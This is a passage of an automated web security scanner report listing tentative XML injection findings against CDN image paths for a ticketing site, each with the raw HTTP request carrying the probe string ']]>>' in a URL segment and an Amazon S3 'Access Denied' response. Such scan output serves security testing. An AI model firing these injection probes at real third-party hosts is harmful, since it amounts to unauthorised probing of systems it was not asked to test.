The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/progressBar_all.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4952B8EED0870F8D
x-amz-id-2: XO63p3zx1mYl+5NgDDXDa5rWy0xqzK8PC3kcGJWrbGHCAEujrB2lTNSAXJWhwUM/
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:45 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 3bb6a54b9d89a0b8b832648a2f656d4923df8abd98d1315b4c3efd42403b929634108ebda1984e15
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4952B8EED0870F8D</RequestId><HostId>XO63p3zx1mYl+5NgDDXDa5rWy0xqzK8PC3kcGJWrbGHCAEujrB
...[SNIP]...

8.199. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/progressBar_all.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/progressBar_all.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5692307D67523023
x-amz-id-2: LspENAd9qFc3atxk7c/JuCxWKKL4zZQK+Pr0p83CdMQO/VB3mlbCMQ/EIaBpIuIr
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:46 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 299cd3b599c04abab9b26b2c421a08cbcb8f09e8ce87e87974e12978893da8b23129553604ebf8e3
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5692307D67523023</RequestId><HostId>LspENAd9qFc3atxk7c/JuCxWKKL4zZQK+Pr0p83CdMQO/VB3ml
...[SNIP]...

8.200. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/progressBar_all.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/progressBar_all.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9731CD41F157965A
x-amz-id-2: Y92qeVuq+0f52f/sIrMnKj5p2mD0g1JCoRmVMkjP6u5oTl3zMNt5Dqxgw0Az97Jr
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: cb2c73809a55650113a01335776c3279ed625c413bdd8c3062aefd9e485a0aeae5a5607e78aebd28
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9731CD41F157965A</RequestId><HostId>Y92qeVuq+0f52f/sIrMnKj5p2mD0g1JCoRmVMkjP6u5oTl3zMN
...[SNIP]...

8.201. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BCE770010370D439
x-amz-id-2: yXLSy7a5egZ1oySscYmJgg78Wmmd4Qtl0TfLy9N3+yMTLq9H7azBDmIsJ8QWJ2nt
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:43 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d35a394a96a9de16ef45f10e6c37357dfa18ba2ab455c9148457dd76d37fa86e85f44dcd1a428e94
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BCE770010370D439</RequestId><HostId>yXLSy7a5egZ1oySscYmJgg78Wmmd4Qtl0TfLy9N3+yMTLq9H7a
...[SNIP]...

8.202. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9424DDABF6B3EB85
x-amz-id-2: NekkuvI5cQBgIumpBRlKhph9W6DAmsb1MatESnfat55T00kL5hOTirUw3f4HUhyJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:45 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 362083ac4644e62d5b50c81337362c53a92fcdb5f2b8cfeb177e40ec8ca7e3a329c1df8463596c3b
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9424DDABF6B3EB85</RequestId><HostId>NekkuvI5cQBgIumpBRlKhph9W6DAmsb1MatESnfat55T00kL5h
...[SNIP]...

8.203. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AD5969C5272C5072
x-amz-id-2: /XbEdueLcFmUMMWYDUVVSHwRsSjxDxKKJJajeCWf6uAWF0VfJkLgI0fOTq1qy0RC
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:48 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b1bd93a9b8e3282b68b5ec4fcda7c7e149f737f74b61290b46c3ad0dfb288f385cf8ace2fae45a4e
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AD5969C5272C5072</RequestId><HostId>/XbEdueLcFmUMMWYDUVVSHwRsSjxDxKKJJajeCWf6uAWF0VfJk
...[SNIP]...

8.204. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9E1EBADA150E2C6C
x-amz-id-2: Z79G2Gwb68wDM8R/9OLave0TNoQGtMXsfDu5eVLy23STfQGkLqD7Nr2gSOWS+Yiy
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:18 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: dd7f5c64bd1c22e891b9e5a00356b2744a04f1e2e8b06391524013ffbf2fc748a9a409915d345621
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9E1EBADA150E2C6C</RequestId><HostId>Z79G2Gwb68wDM8R/9OLave0TNoQGtMXsfDu5eVLy23STfQGkLq
...[SNIP]...

8.205. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6C13D5704545D95B
x-amz-id-2: oLdzht6GSIIiakC+4WfMjJaSMtXe412IUMKyfhCRl95gMgNm/4pXCRebcYc4l25y
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:22 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f80dc6ebcbb2ebd4e584646f4e59eeb6b6725a49cd6ecfc62056ed934bf12ed2cffba43de750417e
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6C13D5704545D95B</RequestId><HostId>oLdzht6GSIIiakC+4WfMjJaSMtXe412IUMKyfhCRl95gMgNm/4
...[SNIP]...

8.206. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-large-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F1122D085F1BF757
x-amz-id-2: 8UOZsQXbwQkw38ECJb6Lo+aw2xaHBT+74nVt/uJ0rA/yVaDEYdSJjMGMaL/hnxC8
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:25 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 93b8faac7a2d65f6e081bd9ea58386d84edeaafe23c2270106733c9ab58ad579e8c9766a4ad1273a
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F1122D085F1BF757</RequestId><HostId>8UOZsQXbwQkw38ECJb6Lo+aw2xaHBT+74nVt/uJ0rA/yVaDEYd
...[SNIP]...

8.207. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 301F2BF9BC988511
x-amz-id-2: okOT+aukvO9gWm2huDe4R+1Gbyxjgxux0b9FGIiKiYcI2z2O0vLfhfAdtsQXxhDQ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:27 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6e8ee9983a8036d8b1f351d5da216c8357f7ffc5ebc71b9fbd9fbd222b45d44baa45a4a9b772975c
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>301F2BF9BC988511</RequestId><HostId>okOT+aukvO9gWm2huDe4R+1Gbyxjgxux0b9FGIiKiYcI2z2O0v
...[SNIP]...

8.208. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-1.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 25AA2945D2C2D2A8
x-amz-id-2: QlBQyewV1BHIAtqOWVK9AiyrKL/Cf/YJd2AJ21GUkVsrpQbcm9crXJWSahwQKTFD
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:48 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 304405e0290e905e9686a3af7215496d451c60b4cde39998594fc79c44638cf994663f4a11b42be3
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>25AA2945D2C2D2A8</RequestId><HostId>QlBQyewV1BHIAtqOWVK9AiyrKL/Cf/YJd2AJ21GUkVsrpQbcm9
...[SNIP]...

8.209. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-1.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D6C725EEBA2CEC2C
x-amz-id-2: B8BjCOl5rNpAvQI5nO9GfHD+4SJyUM/dYIJlsZbYdzh02WuzBM53MIHvFhve/w/a
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6ae379a146fb4bc853e310cd6f2aa52806c3b9589c5bbde398118bd02489185ac4ad1e3d71115787
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D6C725EEBA2CEC2C</RequestId><HostId>B8BjCOl5rNpAvQI5nO9GfHD+4SJyUM/dYIJlsZbYdzh02WuzBM
...[SNIP]...

8.210. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-1.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 430005F252D92449
x-amz-id-2: og8U60uJliIjymQQzs3iuLP7XETclhYDxJaHz9tBLBDcevJ2gsNBJzlGU3Tqz4Vp
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 8392b50da117744b61c91dd61ed271ca476aeb88deef992b919d67d3b43c8221f0e92f2fe318ebc5
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>430005F252D92449</RequestId><HostId>og8U60uJliIjymQQzs3iuLP7XETclhYDxJaHz9tBLBDcevJ2gs
...[SNIP]...

8.211. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif

Issue detail

